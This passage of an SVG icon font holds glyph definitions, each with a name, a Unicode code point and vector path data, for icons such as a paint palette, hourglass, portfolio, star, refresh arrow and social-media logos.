zM64 -36.5713c25.207 0 45.7139 20.5068 45.7139 45.7139s-20.5068 45.7148 -45.7139 45.7148s-45.7139 -20.5078 -45.7139 -45.7148s20.5068 -45.7139 45.7139 -45.7139zM265.143 258.788c31.0859 -5.27539 54.8574 -32.3291 54.8574 -64.8955
s-23.7715 -59.6201 -54.8574 -64.8965v-174.71c0 -5.05664 -4.0957 -9.14355 -9.14258 -9.14355s-9.14258 4.08691 -9.14258 9.14355v174.135c-32.9326 3.62012 -58.6426 31.5977 -58.6426 65.4717s25.71 61.8516 58.6426 65.4717v170.35
c0 5.05664 4.0957 9.14355 9.14258 9.14355s9.14258 -4.08691 9.14258 -9.14355v-170.926zM254.107 146.286c26.249 0 47.6064 21.3574 47.6064 47.6064s-21.3486 47.6064 -47.6064 47.6064s-47.6064 -21.3574 -47.6064 -47.6064s21.3574 -47.6064 47.6064 -47.6064z
M512 374.857c0 -32.1738 -23.8906 -58.8076 -54.8574 -63.2686v-357.303c0 -5.05664 -4.0957 -9.14355 -9.14258 -9.14355s-9.14258 4.08691 -9.14258 9.14355v357.303c-30.9668 4.46094 -54.8574 31.0947 -54.8574 63.2686c0 35.2822 28.709 64 64 64s64 -28.7178 64 -64z
M448 329.143c25.207 0 45.7139 20.5078 45.7139 45.7148s-20.5068 45.7139 -45.7139 45.7139s-45.7139 -20.5068 -45.7139 -45.7139s20.5068 -45.7148 45.7139 -45.7148z" />
    <glyph glyph-name="069-paint" unicode="&#xf13f;" 
d="M133.609 115.732c8.69629 -6.87891 14.1641 -16.708 15.3975 -27.6748c1.23047 -10.9375 -1.89941 -21.6934 -8.81348 -30.2861c-7.90723 -9.8418 -19.7246 -15.4902 -32.4219 -15.4902c-9.33496 0 -18.5039 3.18457 -25.8223 8.96875
c-8.69531 6.87305 -14.166 16.6963 -15.4023 27.6621c-1.23438 10.9434 1.89844 21.7109 8.81836 30.3184c7.91309 9.83203 19.7295 15.4697 32.417 15.4697c9.33594 0 18.5088 -3.18555 25.8271 -8.96777zM125.461 69.6152c3.73633 4.64062 5.4248 10.4375 4.76172 16.3291
c-0.666016 5.92285 -3.62598 11.2354 -8.33594 14.959c-4.0498 3.20117 -8.92773 4.89453 -14.1045 4.89453c-6.93652 0 -13.3857 -3.06836 -17.6904 -8.41797c-3.73535 -4.64355 -5.42676 -10.4531 -4.76172 -16.3486c0.668945 -5.91992 3.63086 -11.2295 8.3418 -14.9531
c4.05176 -3.20312 8.92773 -4.89648 14.0996 -4.89648c6.9375 0 13.3857 3.0752 17.6895 8.43359zM299.806 212.534c-15.8379 0 -30.5264 9.15332 -37.4219 23.3193c-4.81152 9.88867 -5.46191 21.0508 -1.83105 31.4297c3.64941 10.4404 11.1807 18.8223 21.1982 23.6006
c5.66797 2.70508 11.709 4.0752 17.9561 4.0752c15.8418 0 30.5195 -9.15527 37.3916 -23.3223c4.80469 -9.88379 5.45605 -21.0439 1.83203 -31.415c-3.64355 -10.4375 -11.1709 -18.8252 -21.1924 -23.6201c-5.66895 -2.70215 -11.6973 -4.06738 -17.9326 -4.06738z
M278.393 261.044c-1.95312 -5.58887 -1.60352 -11.5967 0.984375 -16.9189c3.75293 -7.70801 11.7705 -12.6885 20.4277 -12.6885c3.39941 0 6.69238 0.74707 9.78809 2.22266c5.43164 2.59863 9.51855 7.14453 11.4922 12.7949
c1.9502 5.58594 1.59961 11.5957 -0.992188 16.9258c-3.73633 7.7041 -11.7383 12.6768 -20.3877 12.6768c-3.4082 0 -6.70996 -0.750977 -9.81641 -2.23145c-5.4375 -2.59473 -9.52051 -7.13477 -11.4961 -12.7812zM196.954 279.327
c-10.8467 2.44141 -20.0762 8.95605 -25.9795 18.3418c-5.85254 9.30566 -7.71875 20.3164 -5.25488 31.0029c4.33301 18.8564 20.9385 32.0293 40.3828 32.0293c3.10938 0 6.2334 -0.352539 9.28613 -1.0459c10.834 -2.4541 20.0537 -8.96875 25.9521 -18.3418
c5.85059 -9.2998 7.72949 -20.3086 5.28711 -31.0029c-4.34766 -18.8594 -20.9707 -32.0186 -40.4277 -32.0186c-3.09473 0 -6.20605 0.348633 -9.24609 1.03516zM184.142 324.431c-1.32617 -5.75391 -0.320312 -11.6826 2.83398 -16.7002
c3.20508 -5.09375 8.22559 -8.63281 14.1367 -9.96387c1.68262 -0.379883 3.3916 -0.572266 5.08691 -0.572266c10.4316 0 19.6865 7.29492 22.0029 17.3457c1.31445 5.74707 0.299805 11.6855 -2.86035 16.7051c-3.20703 5.09473 -8.22656 8.63672 -14.1367 9.97559
c-1.6875 0.382812 -3.40234 0.577148 -5.10254 0.577148c-10.5801 0 -19.6123 -7.14258 -21.9609 -17.3672zM121.851 255.748c-7.2998 -5.78418 -16.4629 -8.96875 -25.7969 -8.9707c-12.7021 0 -24.5293 5.64355 -32.4492 15.4824
c-6.92871 8.62305 -10.0605 19.3965 -8.82227 30.3457c1.23926 10.9609 6.7041 20.7754 15.3906 27.6367c7.32031 5.77344 16.4834 8.94922 25.8096 8.94922c12.6885 0 24.5137 -5.63574 32.4395 -15.4639c6.91699 -8.6084 10.041 -19.3633 8.81055 -30.2988
c-1.23535 -10.9678 -6.69629 -20.7988 -15.3818 -27.6807zM78.3359 274.11c4.30957 -5.35449 10.7676 -8.42969 17.7188 -8.42773c5.16504 0 10.0283 1.68848 14.0586 4.88184c4.70898 3.72949 7.66992 9.05078 8.33594 14.9795
c0.663086 5.89355 -1.02539 11.6943 -4.75 16.335c-4.30859 5.3418 -10.7715 8.41309 -17.7148 8.41309c-5.17188 0 -10.0469 -1.68848 -14.0967 -4.88281c-4.69434 -3.70996 -7.65234 -9.01172 -8.32031 -14.9238c-0.667969 -5.90332 1.02539 -11.7188 4.76855 -16.375z
M508.385 348.233c8.31445 -8.37793 1.66016 -22.0127 -13.5342 -44.2432c-11.4688 -16.7842 -28.542 -38.8623 -50.7461 -65.6182c-12.9775 -15.6396 -27.1943 -32.2383 -41.8682 -48.9365c-0.631836 -60.5107 -24.668 -117.295 -67.8848 -160.136
c-43.7744 -43.3945 -101.977 -67.292 -163.889 -67.292h-0.0664062c-34.1152 0.00976562 -75.5996 11.9531 -108.263 31.167c-40.0186 23.541 -62.0625 55.0059 -62.0723 88.5947c-0.0126953 40.5625 22.8574 57.5186 41.2324 71.1406
c14.9795 11.1055 26.8105 19.876 26.8066 39.1133c-0.00683594 19.2393 -11.8438 28.0186 -26.832 39.1338c-18.3809 13.6309 -41.2559 30.5957 -41.2686 71.1533c-0.0078125 33.5938 22.0225 65.0508 62.0322 88.5713c32.6396 19.1904 74.1025 31.1084 108.211 31.1084
h0.0400391c50.541 -0.0126953 98.585 -15.8662 138.932 -45.8438c35.1885 -26.1455 62.4951 -62.291 78.0381 -102.835c1.77051 1.51855 3.53418 3.02539 5.2832 4.5127c86.9883 74.0215 101.312 74.0215 106.703 74.0215c4.59766 0 7.51172 -1.96387 9.14551 -3.6123z
M321.046 42.7236c34.0898 33.7939 55.1807 77.0361 60.7979 123.772c-24.4062 -27.1455 -49.0879 -53.498 -70.6885 -75.3525c-6.39062 -27.5566 -19.1074 -48.1045 -37.8613 -61.0654c-15.2197 -10.5176 -34.0938 -15.8506 -56.0957 -15.8506h-0.0107422
c-31.5732 0.000976562 -58.5977 11.043 -59.7334 11.5127c-4.03516 1.6709 -6.39941 5.88965 -5.71875 10.2021c0.678711 4.31445 4.22461 7.60059 8.57812 7.9502c17.6689 1.41797 20.6914 12.4854 25.3477 35.376c5.46973 26.8838 12.9502 63.4785 67.8594 70.5859
c33.0605 33.167 77.4521 74.4365 118.446 110.231c-13.7451 39.834 -39.8398 75.4893 -74.0244 100.89c-37.0654 27.5371 -81.2119 42.1016 -127.666 42.1143h-0.0332031c-30.4668 0 -69.1777 -11.1855 -98.6299 -28.502
c-19.6904 -11.5762 -52.7188 -36.3564 -52.7109 -72.2725c0.00976562 -31.0459 16.3379 -43.1543 33.624 -55.9746c16.1553 -11.9795 34.4648 -25.5586 34.4746 -54.3105c0.00585938 -28.7568 -18.2988 -42.3291 -34.4492 -54.3037
c-17.2783 -12.8096 -33.5977 -24.9082 -33.5879 -55.9502c0.0175781 -58.4883 90.4697 -100.849 151.44 -100.866h0.0595703c56.8975 0 110.369 21.9492 150.582 61.8135zM292.166 92.9326l-37.6982 37.9971c-40.1807 -5.74023 -45.0918 -29.9014 -50.2852 -55.4326
c-2.72656 -13.4033 -5.87598 -28.875 -15.957 -39.1562c8.44043 -1.78223 18.4785 -3.21289 28.9619 -3.21289h0.00878906c39.7549 -0.00195312 64.9551 20.1162 74.9697 59.8047zM422.681 242.198c39.8203 47.4414 57.1094 72.2686 64.6152 84.9121
c-12.5684 -7.59375 -37.207 -25.0439 -84.2217 -65.1406c-4.625 -3.94434 -9.31738 -7.99023 -14.04 -12.0889v0c-40.5117 -35.1602 -83.9336 -75.3359 -117.781 -109.029l25.5 -25.7021l5.7793 -5.8252c37.332 38.1123 82.6826 88.2373 120.148 132.874z" />
    <glyph glyph-name="048-hourglass" unicode="&#xf12c;" 
d="M244.4 210.68c0 5.52344 4.47656 10 10 10c5.52246 0 10 -4.47656 10 -10c0 -5.52246 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47754 -10 10zM162.07 392.79c0 5.52246 4.47656 10 10 10c5.52246 0 10 -4.47754 10 -10s-4.47754 -10 -10 -10
c-5.52344 0 -10 4.47754 -10 10zM244.4 157.6c0 5.52344 4.47656 10 10 10c5.52246 0 10 -4.47656 10 -10c0 -5.52246 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47754 -10 10zM244.4 104.53c0 5.52246 4.47656 10 10 10c5.52246 0 10 -4.47754 10 -10
c0 -5.52344 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47656 -10 10zM341.92 193.269c-0.46582 -0.300781 -0.702148 -0.726562 -0.702148 -1.26855s0.236328 -0.967773 0.702148 -1.26758c34.292 -22.0576 54.7646 -59.5352 54.7646 -100.258v-89.2793
c24.793 -0.249023 44.8877 -20.4863 44.8877 -45.3359v-9.85938c0 -5.52246 -4.47852 -10 -10 -10h-351.144c-5.52148 0 -10 4.47754 -10 10v9.8584c0 24.958 20.2676 45.2666 45.207 45.3438v89.2715c0 40.7227 20.4736 78.2002 54.7656 100.257
c0.46582 0.300781 0.701172 0.726562 0.701172 1.26855s-0.235352 0.967773 -0.701172 1.26758c-34.292 22.0576 -54.7656 59.5352 -54.7656 100.258v89.5713c-25.3809 2.75 -45.207 24.3018 -45.207 50.4014v4.50293c0 5.52246 4.47852 10 10 10h351.144
c5.52148 0 10 -4.47754 10 -10v-4.50293c0 -25.9893 -19.6602 -47.4629 -44.8877 -50.3604v-89.6113c0 -40.7227 -20.4727 -78.2002 -54.7646 -100.257zM396.224 -18.793h-9.53906h-261.007c-0.0107422 0 -0.0224609 -0.00195312 -0.0341797 -0.00195312
c-0.00878906 0 -0.0175781 0.00195312 -0.0273438 0.00195312h-9.83887c-13.9307 0 -25.2725 -11.2949 -25.3486 -25.207h331.143c-0.0761719 13.9121 -11.418 25.207 -25.3477 25.207zM168.265 1.20703h175.562l-87.6729 43.6328zM331.102 173.911
c-6.19043 3.97949 -9.88477 10.7412 -9.88477 18.0879s3.69531 14.1104 9.88379 18.0898c28.543 18.3584 45.583 49.5479 45.583 83.4355v89.2686h-158.446c-5.52246 0 -10 4.47852 -10 10c0 5.52246 4.47754 10 10 10h172.63c15.0557 0 27.6143 10.8896 30.2119 25.207
h-330.156c2.59863 -14.3174 15.1562 -25.207 30.2109 -25.207h4.66309c5.52246 0 10 -4.47754 10 -10c0 -0.591797 -0.0605469 -1.16895 -0.160156 -1.7334v-97.5332c0 -33.8877 17.04 -65.0781 45.583 -83.4365c6.19043 -3.97949 9.88379 -10.7422 9.88379 -18.0889
s-3.69434 -14.1104 -9.88379 -18.0898c-28.543 -18.3584 -45.583 -49.5479 -45.583 -83.4355v-83.1396l116.078 57.6279c2.80176 1.3916 6.09863 1.3916 8.90137 -0.00488281l116.068 -57.7656v83.2812c0 33.8877 -17.04 65.0781 -45.583 83.4365zM338.63 288.89
c5.52246 0 10 -4.47754 10 -10s-4.47754 -10 -9.99902 -10h-60.1777c-10.7383 0 -12.4004 -7.35547 -12.4209 -11.8027c0.000976562 -0.0703125 0.000976562 -0.139648 0.000976562 -0.209961c0 -5.47559 -4.40332 -9.93262 -9.87793 -9.99902
c-0.0410156 -0.000976562 -0.0830078 -0.000976562 -0.124023 -0.000976562c-5.41895 0 -9.8623 4.32324 -9.99512 9.75586c-0.000976562 0.0351562 -0.00195312 0.078125 -0.00195312 0.126953c-0.125977 3.67285 -1.91602 12.1299 -15.6836 12.1299h-60.1768
c-5.52148 0 -10 4.47852 -10 10c0 5.52246 4.47852 10 10 10h60.1768c11.2441 0 19.4111 -3.53027 25.0703 -8.58008c4.08887 4.0127 11.3193 8.58008 23.0312 8.58008h60.1777z" />
    <glyph glyph-name="044-portfolio" unicode="&#xf128;" 
d="M317.5 422.676c18.8135 0 34.1182 -15.3037 34.1182 -34.1172v-15.6768c0 -5.52246 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47754 -10 10v15.6768c0 7.78418 -6.33301 14.1172 -14.1182 14.1172h-121.794c-7.78516 0 -14.1182 -6.33301 -14.1182 -14.1172v-15.6768
c0 -5.52246 -4.47656 -10 -10 -10c-5.52246 0 -10 4.47754 -10 10v15.6768c0 18.8125 15.3047 34.1172 34.1182 34.1172h121.794zM463.178 341.882c26.9209 0 48.8223 -21.9004 48.8223 -48.8223v-90.3115c0 -4.4541 -2.94727 -8.37109 -7.22559 -9.60742l-6.03906 -1.74316
v-208.016c0 -12.1631 -9.89551 -22.0586 -22.0596 -22.0586h-441.353c-12.1631 0 -22.0596 9.89551 -22.0596 22.0586v209.488l-6.09277 1.79688c-4.25195 1.25488 -7.1709 5.15918 -7.1709 9.5918v88.8008c0 26.9219 21.9014 48.8223 48.8223 48.8223h414.355z
M89.2354 -18.6758v28.7598c0 15.0029 -12.2061 27.21 -27.21 27.21h-28.7607v-53.9121c0 -1.13477 0.923828 -2.05762 2.05859 -2.05762h53.9121zM478.734 -16.6182v53.9121h-28.7607c-15.0029 0 -27.21 -12.2061 -27.21 -27.21v-28.7598h53.9121
c1.13574 0 2.05957 0.922852 2.05859 2.05762zM478.736 57.2939v128.327l-176.56 -50.9883v-31.8682c0 -5.52246 -4.47656 -10 -10 -10h-72.3525c-5.52344 0 -10 4.47754 -10 10v32.1357l-176.56 52.0703v-129.677h28.7607c26.0303 0 47.21 -21.1777 47.21 -47.21v-28.7598
h293.529v28.7598c0 26.0312 21.1787 47.21 47.21 47.21h28.7607h0.000976562zM229.823 112.765h52.3525v48.7354h-52.3525v-18.9453v-0.0830078v-29.707zM492 210.269v82.791c0 15.8926 -12.9287 28.8223 -28.8223 28.8223h-44.0303v-34.6182
c0 -5.52246 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47754 -10 10v34.6182h-289.912v-34.6182c0 -5.52246 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47754 -10 10v34.6182h-40.4131c-15.8926 0 -28.8223 -12.9287 -28.8223 -28.8223v-81.3242l189.823 -55.9854v15.75
c0 5.52344 4.47656 10 10 10h72.3525c5.52344 0 10 -4.47656 10 -10v-16.0498zM399.15 248.68c0 5.52344 4.47656 10 10 10c5.52246 0 10 -4.47656 10 -10c0 -5.52246 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47754 -10 10zM89.2305 248.68c0 5.52344 4.47656 10 10 10
c5.52246 0 10 -4.47656 10 -10c0 -5.52246 -4.47754 -10 -10 -10c-5.52344 0 -10 4.47754 -10 10z" />
    <glyph glyph-name="081-facebook" unicode="&#xf146;" 
d="M288 272h96l-32 -80h-64v-256h-96v256h-64v80h64v80c0 53.0244 42.9756 96 96 96h64v-80h-32c-17.6641 0 -32 -14.3359 -32 -32v-64z" />
    <glyph glyph-name="046-business" unicode="&#xf12a;" 
d="M443.054 -47.1709c0.449219 -4.29297 -0.941406 -8.57812 -3.83594 -11.7891c-2.88672 -3.20703 -7.00391 -5.03906 -11.3242 -5.03906h-412.655c-4.31641 0 -8.43359 1.83203 -11.3242 5.03906c-2.88672 3.21094 -4.28125 7.49609 -3.83203 11.7891l38.9141 370.573
c0.816406 7.75781 7.35547 13.6484 15.1562 13.6484h73.1406v16.6758c0 51.9805 42.293 94.2734 94.2773 94.2734c51.9795 0 94.2725 -42.293 94.2725 -94.2734v-16.6758h73.1406c7.80078 0 14.3398 -5.89062 15.1562 -13.6484zM157.77 353.727v-16.6758h127.597v16.6758
c0 35.1758 -28.6211 63.7969 -63.7959 63.7969c-35.1797 0 -63.8008 -28.6211 -63.8008 -63.7969zM32.1602 -33.5225h378.815l-35.7148 340.097h-59.418v-33.582c0 -8.41406 -6.82422 -15.2383 -15.2383 -15.2383s-15.2383 6.82422 -15.2383 15.2383v33.582h-127.597
v-33.582c0 -8.41406 -6.82422 -15.2383 -15.2383 -15.2383s-15.2383 6.82422 -15.2383 15.2383v33.582h-59.418zM32.1602 -33.5225z" />
    <glyph glyph-name="047-precious-stone" unicode="&#xf12b;" 
d="M506.135 226.037c2.60449 -2.94727 3.23926 -7.14648 1.62305 -10.7324c-0.609375 -1.35059 -1.49805 -2.51953 -2.57715 -3.45312c-0.0195312 -0.0234375 -0.0371094 -0.0498047 -0.0576172 -0.0722656l-241.642 -272.415
c-1.89844 -2.13965 -4.62109 -3.36426 -7.48145 -3.36426s-5.58301 1.22363 -7.48145 3.36426l-241.642 272.415c-0.0205078 0.0234375 -0.0371094 0.0498047 -0.0576172 0.0722656c-1.08008 0.933594 -1.96875 2.10156 -2.57715 3.45312
c-1.61621 3.58594 -0.981445 7.78516 1.62305 10.7324l87.1982 98.667c1.89746 2.14746 4.62695 3.37793 7.49219 3.37793h310.89c2.86523 0 5.59473 -1.23047 7.49316 -3.37793zM393.713 308.083h-115.661l71.2207 -71.6436zM328.054 229.415l-72.0537 72.4834
l-72.0537 -72.4834h144.107zM233.948 308.082h-115.661l44.4404 -71.6436zM99.0039 301.226l-63.4629 -71.8105h108.008zM35.709 209.415l199.814 -225.261l-81.6367 225.261h-118.178zM276.848 -15.4277l199.443 224.843h-301.131l80.9307 -223.316l59.0352 159.777
c1.91309 5.18066 7.66309 7.83008 12.8457 5.91406c5.18066 -1.91406 7.82812 -7.66504 5.91406 -12.8457zM368.451 229.415h108.008l-63.4629 71.8105zM256 448c5.52246 0 10 -4.47656 10 -10v-51.5127c0 -5.52344 -4.47754 -10 -10 -10s-10 4.47656 -10 10v51.5127
c0 5.52344 4.47754 10 10 10zM347.062 408.476c3.90527 -3.9043 3.90527 -10.2363 0 -14.1416l-36.4258 -36.4248c-1.95312 -1.95215 -4.51172 -2.92871 -7.07031 -2.92871c-2.55957 0 -5.11816 0.975586 -7.07227 2.92871c-3.90527 3.90527 -3.90527 10.2373 0 14.1416
l36.4258 36.4248c3.9082 3.90527 10.2383 3.90527 14.1426 0zM213.558 372.051c3.90527 -3.9043 3.90527 -10.2363 0 -14.1416c-1.95215 -1.95215 -4.51172 -2.92871 -7.07031 -2.92871c-2.55957 0 -5.11816 0.975586 -7.07129 2.92871l-36.4258 36.4248
c-3.90527 3.90527 -3.90527 10.2373 0 14.1416c3.90918 3.90527 10.2383 3.90527 14.1426 0zM327.43 179.64c0 5.52344 4.47754 10 10 10c5.52344 0 10 -4.47656 10 -10c0 -5.52246 -4.47656 -10 -10 -10c-5.52246 0 -10 4.47754 -10 10z" />
    <glyph glyph-name="037-signs" unicode="&#xf121;" 
d="M486.398 217.6c14.1328 0 25.6035 -11.4697 25.6035 -25.5977c0 -14.1328 -11.4707 -25.6035 -25.6035 -25.6035h-204.797v-204.797c0 -14.1328 -11.4707 -25.6035 -25.6035 -25.6035c-14.1279 0 -25.5977 11.4707 -25.5977 25.6035v204.797h-204.802
c-14.1279 0 -25.5986 11.4707 -25.5986 25.6035c0 14.1279 11.4707 25.5977 25.5986 25.5977h204.802v204.802c0 14.1279 11.4697 25.5986 25.5977 25.5986c14.1328 0 25.6035 -11.4707 25.6035 -25.5986v-204.802h204.797zM486.398 217.6z" />
    <glyph glyph-name="061-star" unicode="&#xf137;" 
d="M511.651 261.754c3.37793 -10.4111 0.254883 -21.7812 -7.95312 -28.9824l-111.94 -98.1572l33.0059 -145.37c2.41406 -10.6885 -1.73438 -21.7412 -10.6035 -28.1523c-8.84863 -6.41113 -20.626 -6.92383 -29.9922 -1.32617l-127.671 76.3516l-127.694 -76.3516
c-4.31738 -2.58398 -9.15137 -3.86719 -13.9805 -3.86719c-5.62109 0 -11.2217 1.72949 -15.9883 5.19336c-8.86914 6.41113 -13.0176 17.4639 -10.6035 28.1523l33.0059 145.37l-111.94 98.1572c-8.21191 7.20117 -11.3311 18.5947 -7.95312 28.9824
c3.39648 10.3672 12.5908 17.7217 23.4482 18.7236l148.109 13.4443l58.5244 137.018c4.29297 10.0664 14.1289 16.5635 25.0723 16.5635s20.7754 -6.49707 25.0957 -16.5635l58.5244 -137.018l148.086 -13.4443c10.8574 -0.982422 20.0713 -8.33691 23.4482 -18.7236z
M258.955 37.5928z" />
    <glyph glyph-name="086-google-plus" unicode="&#xf14b;" 
d="M448 224h64v-32h-64v-64h-32v64h-64v32h64v64h32v-64zM160 224h160v-32c0 -88.2236 -71.7764 -160 -160 -160s-160 71.7764 -160 160s71.7764 160 160 160c38.4316 0 75.4238 -13.8242 104.224 -38.9121l-42.0479 -48.2559
c-17.1514 14.9443 -39.2314 23.168 -62.1758 23.168c-52.9277 0 -96 -43.0723 -96 -96s43.0723 -96 96 -96c41.7275 0 77.3115 26.752 90.5283 64h-90.5283v64z" />
    <glyph glyph-name="090-refresh" unicode="&#xf14f;" 
d="M497.993 222.331c12.8818 -76.2129 -10.8906 -154.039 -64.1592 -210.046c-93.415 -98.2158 -248.761 -102.108 -346.977 -8.69238c-98.2158 93.415 -102.107 248.762 -8.69336 346.977c93.415 98.2148 248.762 102.107 346.977 8.69238v69.667
c0 10.5332 8.53809 19.0713 19.0713 19.0713s19.0713 -8.53809 19.0713 -19.0713v-114.427c0.00195312 -8.21289 -5.25391 -15.5039 -13.0449 -18.0986l-114.427 -38.1416c-0.00195312 0 -0.00390625 -0.000976562 -0.0078125 -0.00292969
c-9.99414 -3.32422 -20.791 2.08105 -24.1172 12.0752c-0.000976562 0.00292969 -0.00195312 0.00585938 -0.00292969 0.0078125c-3.32422 9.99512 2.08105 20.792 12.0752 24.1172l84.4844 28.1484c-48.1582 52.5996 -119.723 77.1592 -190.032 65.2158
c-114.326 -19.4219 -191.264 -127.846 -171.843 -242.173c19.4219 -114.327 127.846 -191.264 242.173 -171.843c114.328 19.4219 191.264 127.846 171.843 242.173c-0.0205078 0.113281 -0.0390625 0.225586 -0.0566406 0.339844
c-1.66016 10.4014 5.42578 20.1787 15.8271 21.8379c10.4014 1.66016 20.1787 -5.42578 21.8389 -15.8271z" />
    <glyph glyph-name="004-left-arrow" unicode="&#xf103;" 
d="M206.682 191.892l191.325 -191.325c10.9189 -10.915 10.9189 -28.6885 0 -39.6074l-16.7793 -16.7754c-5.27344 -5.27832 -12.3047 -8.18359 -19.8057 -8.18359c-7.50488 0 -14.5352 2.90527 -19.8057 8.18359l-227.844 227.832
c-5.29492 5.29004 -8.18848 12.3457 -8.16699 19.8887c-0.0214844 7.50977 2.87598 14.5732 8.16699 19.8594l228.057 228.053c5.26953 5.27832 12.2998 8.18359 19.8008 8.18359s14.54 -2.90527 19.8057 -8.18359l16.7842 -16.7754
c5.27344 -5.26953 8.1748 -12.3008 8.1748 -19.8057c0 -7.50098 -2.90137 -14.5361 -8.1748 -19.7969z" />
    <glyph glyph-name="036-left-quote" unicode="&#xf120;" 
d="M477.626 217.069c22.166 -22.5723 34.374 -52.4287 34.374 -84.0693c0 -66.168 -53.832 -120 -120 -120s-120 53.832 -120 120c0 135.148 54.6797 224.797 57.0068 228.547l5.86719 9.45312h87.584l-7.2168 -25.4561
c-7.05273 -24.8789 -18.2412 -69.832 -18.2412 -84.5439c0 -3.59082 0.107422 -6.21484 0.250977 -8.11914c30.4707 -1.31055 58.917 -13.9609 80.375 -35.8115zM392 53c44.1123 0 80 35.8877 80 80c0 43.2627 -35.1758 79.1406 -78.4131 79.9785l-0.873047 0.0224609
c-17.542 0.0957031 -26.0938 9.10547 -30.1826 16.6689c-4.59082 8.49219 -5.53125 18.666 -5.53125 31.3301c0 15.959 7.19434 47.416 12.9414 70h-12.1299c-12.9756 -25.166 -45.8115 -98.6797 -45.8115 -198c0 -44.1123 35.8877 -80 80 -80zM205.626 217.069
c22.166 -22.5723 34.374 -52.4287 34.374 -84.0693c0 -66.168 -53.832 -120 -120 -120s-120 53.832 -120 120c0 135.148 54.6797 224.797 57.0068 228.547l5.86719 9.45312h87.584l-7.2168 -25.4561c-7.05273 -24.8789 -18.2412 -69.832 -18.2412 -84.5439
c0 -3.59082 0.107422 -6.21484 0.250977 -8.11914c30.4707 -1.31055 58.917 -13.9609 80.375 -35.8115zM120 53c44.1123 0 80 35.8877 80 80c0 43.2627 -35.1758 79.1406 -78.4131 79.9785l-0.873047 0.0224609c-17.542 0.0957031 -26.0938 9.10547 -30.1826 16.6689
c-4.59082 8.49219 -5.53125 18.666 -5.53125 31.3301c0 15.959 7.19434 47.416 12.9414 70h-12.1299c-12.9756 -25.166 -45.8115 -98.6797 -45.8115 -198c0 -44.1123 35.8877 -80 80 -80z" />
    <glyph glyph-name="062-null" unicode="&#xf138;" 
d="M256 448c141.158 0 256 -114.843 256 -256.002c0 -141.158 -114.842 -255.998 -256 -255.998s-256 114.84 -256 255.998c0 141.159 114.842 256.002 256 256.002zM256 -17.4541c115.493 0 209.454 93.959 209.454 209.452s-93.959 209.456 -209.454 209.456
s-209.454 -93.9629 -209.454 -209.456s93.959 -209.452 209.454 -209.452zM255.997 339.394c17.1064 0 31.0234 -13.9258 31.0234 -31.0439c0 -17.1025 -13.917 -31.0166 -31.0234 -31.0166c-17.1074 0 -31.0244 13.9141 -31.0244 31.0166
c0 17.1182 13.917 31.0439 31.0244 31.0439zM256 230.788c12.8525 0 23.2725 -10.4199 23.2725 -23.2725v-139.637c0 -12.8525 -10.4199 -23.2725 -23.2725 -23.2725s-23.2725 10.4199 -23.2725 23.2725v139.637c0 12.8525 10.4199 23.2725 23.2725 23.2725z" />
    <glyph glyph-name="005-play" unicode="&#xf104;" 
d="M473.343 214.322c8.03809 -4.55664 13.0557 -13.0557 13.0557 -22.3232c0 -9.2666 -5.01758 -17.7666 -13.0557 -22.3232l-409.599 -230.399c-3.8916 -2.20117 -8.24316 -3.27637 -12.5439 -3.27637c-4.45508 0 -8.90918 1.17773 -12.9023 3.48145
c-7.88477 4.6084 -12.6982 13.0049 -12.6982 22.1182v460.799c0 9.11328 4.81348 17.5107 12.6982 22.1182c7.83301 4.55664 17.5098 4.65918 25.4463 0.205078z" />
    <glyph glyph-name="026-business-and-finance-1" unicode="&#xf117;" 
d="M505.71 288.425c5.15039 -3.31348 7.4502 -9.48828 5.72266 -15.3623c-1.72656 -5.87598 -7.00195 -9.82422 -13.126 -9.82422h-36.6836v-25.0693v-21.9561c0 -5.78906 -4.10547 -10.6377 -9.55859 -11.7842v-12.8008c0 -6.64062 -5.40137 -12.042 -12.042 -12.042h-1
v-146.15h1c6.64062 0 12.042 -5.40137 12.042 -12.041v-12.8018c5.45215 -1.14648 9.55859 -5.99512 9.55859 -11.7832v-14.6826h25.7637c8.04004 0 14.5811 -6.54102 14.5811 -14.5811v-15.2988c0 -8.04004 -6.54102 -14.5811 -14.5811 -14.5811h-462.772
c-8.04004 0 -14.5811 6.54102 -14.5811 14.5811v15.2988c0 8.04004 6.54102 14.5811 14.5811 14.5811h25.7637v14.6826c0 5.78809 4.10547 10.6367 9.55859 11.7832v12.8018c0 6.63965 5.40137 12.041 12.042 12.041h1v11.3164c0 4.01758 3.25586 7.27344 7.27246 7.27344
c4.01758 0 7.27344 -3.25586 7.27344 -7.27344v-18.5898c0 -4.0166 -3.25586 -7.27246 -7.27344 -7.27246h-5.76758v-10.915h51.5127v10.915h-5.76758c-4.01758 0 -7.27344 3.25586 -7.27344 7.27246v160.696c0 4.01758 3.25586 7.27344 7.27344 7.27344h5.76758v10.0381
h-51.5127v-10.04h5.76758c4.01758 0 7.27344 -3.25684 7.27344 -7.27344v-96.3848c0 -4.01758 -3.25586 -7.27344 -7.27344 -7.27344c-4.0166 0 -7.27246 3.25586 -7.27246 7.27344v89.1113h-1c-6.64062 0 -12.042 5.40234 -12.042 12.043v12.8008
c-5.45215 1.14648 -9.55859 5.99512 -9.55859 11.7842v21.9561v25.0693h-36.6836c-6.12402 0 -11.3994 3.94824 -13.126 9.82422c-1.72754 5.87598 0.572266 12.0498 5.72266 15.3643l241.849 155.604c4.77539 3.07227 10.9473 3.07227 15.7227 0l33.8994 -21.8105
c3.37793 -2.17383 4.35352 -6.67383 2.18066 -10.0518c-2.17383 -3.37793 -6.67285 -4.35449 -10.0518 -2.18066l-33.8994 21.8096l-239.355 -154.013h38.8779l189.847 122.146c6.46387 4.15723 14.8174 4.1582 21.2803 0l189.847 -122.146h38.8779l-166.773 107.302
c-3.37793 2.17383 -4.35449 6.67383 -2.18164 10.0518c2.17383 3.37695 6.67383 4.35547 10.0527 2.18164zM253.23 387.697l-170.832 -109.915h347.205l-170.833 109.915c-1.68262 1.08203 -3.85742 1.08301 -5.54004 0zM64.9238 263.237v-17.7969h77.9033h70.585h85.1768
